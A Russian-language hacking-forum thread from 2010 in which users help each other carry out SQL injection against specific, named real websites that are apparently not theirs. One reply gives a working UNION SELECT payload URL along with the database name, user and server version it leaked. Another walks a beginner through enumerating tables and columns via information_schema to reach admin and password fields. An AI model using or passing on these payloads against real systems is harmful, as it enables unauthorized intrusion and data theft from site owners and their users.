Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
19.02.2010, 10:49
|
|
Участник форума
Регистрация: 20.01.2008
Сообщений: 284
Провел на форуме:
3767223
Репутация:
408
|
|
Это отключает вывод ошибок в PHP
Использование:
Код:
<?php error_reporting(0); ?>
Подробнее тут
http://php.net/manual/en/function.error-reporting.php
Совсем подробно вот тут))):
http://tinyurl.com/yane55b
|
|
|
19.02.2010, 21:25
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
короче ребятки загвоздка вот в чём, не могу придумать как обойти: есть один сайтик, в котором запрос формируется так site.com/catalog_item/156_1_1/ Поманипулировав с параметром 156_1_1 я обнаружил скулю: select * from `dbdrive_catalog_items` where `hid` = "156" order by `ord` limit -20, 20 3. Начал ковыряться дальше вместо 156 поставил 1a5 в надежде, что формирует запрос по знакам _, но не тут то было... получил select * from `dbdrive_catalog_items` where `hid` = "1" order by `ord` limit -20, 20 3. У кого какие мысли??? хотя бы самые отдалённые)
|
|
|
|
19.02.2010, 21:29
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
мысль только одна - ссылку в студию
|
|
|
|
19.02.2010, 21:35
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Ы_ы
Код:
http://www.megatop.by/catalog_item/106_417_1/
|
|
|
|
19.02.2010, 21:40
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
Неа...
|
|
|
|
19.02.2010, 21:44
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Инъекция в LIMIT'e, да еще и регулярка RewriteRule только числовые значения принимает.
|
|
|
|
19.02.2010, 21:44
|
|
Постоянный
Регистрация: 29.01.2010
Сообщений: 958
Провел на форуме:
3078314
Репутация:
382
|
|
Сообщение от _iks_
В начало скрипта добавить надо, вроде
Там пустое место , не индификация
|
|
|
|
19.02.2010, 21:56
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
Вот держи рабочую.
http://www.megatop.by/catalog/women/Polusapogi/sezon=Зима')+as+kod+from+dbdrive_catalog_items +union+select+concat_ws(0x3a,database(),user(),ver sion()),222--+
<option value="222">axismoda_megatop:axismoda_megatop@loca lhost:5.0.86-percona-highperf-b19</option>
|
|
|
|
20.02.2010, 01:12
|
|
Banned
Регистрация: 14.06.2008
Сообщений: 34
Провел на форуме:
119183
Репутация:
13
|
|
я подобрал колличество строк
http://xxxx/page.php?form_id=75%20union%20select%20+1,2,3,4,5% 20from%20pl_menu_page
теперь выяснил что существует строка под названием id
http:/xxxx/page.php?form_id=75%20union%20select%20+1,2,id,4,5 %20from%20pl_menu_page
не могу найти название остальных строк, (user,users,admin методом перебора ничего не дало) каковы мои действия дальше?
Очень хочу разобраться, help please
Последний раз редактировалось Darren; 20.02.2010 в 10:16..
|
|
|
|
20.02.2010, 02:03
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Сообщение от Darren
Всем привет, хочу научиться скулю, ногами сильно не пинать
http://zub.by/page.php?form_id=-75+union+select+1,2,3,4,version%28%29+from+informa tion_schema.tables--
5.0.51a пятая версия..
http://zub.by/page.php?form_id=-75+union+select+1,2,3,4,table_name+from+informatio n_schema.tables+limit+0,1--
id = CHARACTER_SETS
http://zub.by/page.php?form_id=-75+union+select+1,2,3,4,column_name+from+informati on_schema.columns+limit+0,1--
id = CHARACTER_SET_NAME
Меняй LIMIT+1,1..2,1 итд и дойдешь до нужного столбца типа (admin,passwd,name,user итп)
Последний раз редактировалось [Feldmarschall]; 20.02.2010 в 02:08..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.gif){kind=avatar}
Похожие темы
Линейный вид
